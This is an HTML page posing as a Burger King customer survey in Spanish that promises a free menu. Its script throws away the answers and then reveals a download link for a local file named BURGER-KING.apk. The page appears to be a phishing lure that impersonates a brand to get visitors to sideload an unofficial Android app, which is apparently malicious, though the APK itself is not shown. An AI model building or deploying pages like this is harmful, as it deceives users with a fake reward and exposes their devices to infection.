<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>node2 advo</title>
	       
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
        }
        .container {
            max-width: 600px;
            margin: 0 auto;
            padding: 20px;
            background-color: #fff;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        h1 {
            text-align: center;
        }
        .question {
            margin-bottom: 20px;
        }
        label {
            display: block;
            font-weight: bold;
        }
        input[type="radio"] {
            margin-right: 5px;
        }
        input[type="text"] {
            width: 100%;
            padding: 5px;
            margin: 5px 0;
        }
        button {
            background-color: #0074d9;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
        }
        .download-button {
            text-align: center;
            margin-top: 20px;
        }
        .download-button a {
            display: inline-block;
            background-color: #4CAF50;
            color: #fff;
            text-decoration: none;
            padding: 10px 20px;
            border-radius: 5px;
        }
    </style>
</head>
<body>
    <img src="logo.png" alt="Logo de Burger King" style="display: block; margin: 0 auto; max-width: 150px; height: auto;">
    <div class="container">
        <h1>Encuesta de Burger King</h1>
        <p>Si completas esta encuesta, ganarás totalmente gratis un menú de nuestra aplicación.</p>
        <form action="procesar_encuesta.php" method="post" onsubmit="return mostrarMensaje()">
            <div class="question">
                <label>1. ¿Cuál es tu menú favorito?</label>
                <input type="text" name="comida_favorita">
            </div>
            <div class="question">
                <label>2. ¿Con qué frecuencia comes comida rápida?</label>
                <input type="radio" name="frecuencia" value="Diariamente"> Diariamente
                <input type="radio" name="frecuencia" value="Semanalmente"> Semanalmente
                <input type="radio" name="frecuencia" value="Mensualmente"> Mensualmente
            </div>
            <div class="question">
                <label>3. ¿Estás satisfecho con la atención de nuestros empleados?</label>
                <input type="radio" name="atencion" value="Satisfecho"> Satisfecho
                <input type="radio" name="atencion" value="Malo"> Malo
                <input type="radio" name="atencion" value="Insatisfactorio"> Insatisfactorio
            </div>
            <div class="question">
                <label>4. ¿Cuál es tu cadena de comida rápida favorita?</label>
                <input type="radio" name="cadena_favorita" value="McDonald's"> McDonald's
                <input type="radio" name="cadena_favorita" value="Burger King"> Burger King
                <input type="radio" name="cadena_favorita" value="KFC"> KFC
            </div>
            <div class="question">
                <label>5. ¿Tuviste algún problema durante esa experiencia?</label>
                <input type="radio" name="problema" value="Sí"> Sí
                <input type="radio" name="problema" value="No"> No
            </div>
            <div class="question">
                <label>6. ¿Regresarás a este establecimiento en los próximos 30 días?</label>
                <input type="radio" name="regreso" value="Muy"> Muy probable
                <input type="radio" name="regreso" value="Probable"> Probable
                <input type="radio" name="regreso" value="Algo"> Algo probable
                <input type="radio" name="regreso" value="No"> No muy probable
            </div>
            <button type="submit">Enviar</button>
            <div class="download-button" id="download-button" style="display: none;">
        <a href="BURGER-KING.apk" download>Descargar la aplicación</a>
            </div>
            <div id="mensaje" style="display: none;">Sus respuestas han sido guardadas. Reclame su promoción en la aplicación.</div>
        </form>
    </div>
    <script>
        function mostrarMensaje() {
            document.getElementById("mensaje").style.display = "block";
            document.getElementById("download-button").style.display = "block";
            return false; // Evita que el formulario se envíe
        }
    </script>
</body>
</html>
